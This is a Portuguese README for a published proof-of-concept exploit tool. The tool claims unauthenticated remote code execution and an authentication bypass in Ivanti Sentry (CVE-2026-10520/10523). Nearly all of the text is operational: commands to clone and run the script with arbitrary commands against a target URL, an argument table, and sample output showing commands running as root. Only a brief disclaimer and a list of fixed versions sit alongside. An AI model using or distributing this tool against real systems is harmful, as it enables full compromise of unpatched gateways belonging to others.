
CVE-2026-10520
Execução Remota de Código sem Autenticação + Bypass de Autenticação
Autor: Ashraf Zaryouh "0xBlackash"
Duas vulnerabilidades críticas afetando Ivanti Sentry (anteriormente MobileIron Sentry):
Essas falhas permitem que atacantes não autenticados comprometam totalmente o sistema.
python3 CVE-2026-10520.py --url <ALVO> --cmd <COMANDO>
# Uso básico
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "id"
# Modo verboso
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "whoami" -v
# Com proxy
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "uname -a" --proxy 127.0.0.1:8080
# Verificar kernel
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "uname -a"
| Argumento | Descrição | Obrigatório |
|---|---|---|
--url | URL alvo (ex.: https://target:8443) | Sim |
--cmd | Comando a executar | Sim |
-v, --verbose | Ativar saída verbosa | Não |
--proxy | Proxy HTTP (host:porta) | Não |
git clone https://github.com/0xBlackash/CVE-2026-10520.git
cd CVE-2026-10520
chmod +x CVE-2026-10520.py
Quando vulnerável, você verá:
██████╗ ██╗ ██╗██████╗ ██╗ █████╗ ██████╗██╗ ██╗ █████╗ ███████╗██╗ ██╗
██╔═████╗╚██╗██╔╝██╔══██╗██║ ██╔══██╗██╔════╝██║ ██╔╝██╔══██╗██╔════╝██║ ██║
██║██╔██║ ╚███╔╝ ██████╔╝██║ ███████║██║ █████╔╝ ███████║███████╗███████║
████╔╝██║ ██╔██╗ ██╔══██╗██║ ██╔══██║██║ ██╔═██╗ ██╔══██║╚════██║██╔══██║
╚██████╔╝██╔╝ ██╗██████╔╝███████╗██║ ██║╚██████╗██║ ██╗██║ ██║███████║██║ ██║
╚═════╝ ╚═╝ ╚═╝╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝
CVE-2026-10520 & CVE-2026-10523 PoC Exploit
Ivanti Sentry Pre-Auth RCE + Auth Bypass
Author: Ashraf Zaryouh "0xBlackash"
GitHub: https://github.com/0xBlackash
[+] Target is VULNERABLE!
Command Output:
uid=0(root) gid=0(root) groups=0(root)
Esta ferramenta é apenas para testes de segurança educacionais e autorizados.
O uso não autorizado contra sistemas que você não possui é ilegal.
O autor não assume nenhuma responsabilidade pelo uso indevido.
Corrigido em: 10.5.2 / 10.6.2 / 10.7.1
Feito com ❤️ por Ashraf Zaryouh "0xBlackash"
Dê uma estrela no repositório se achou útil! ⭐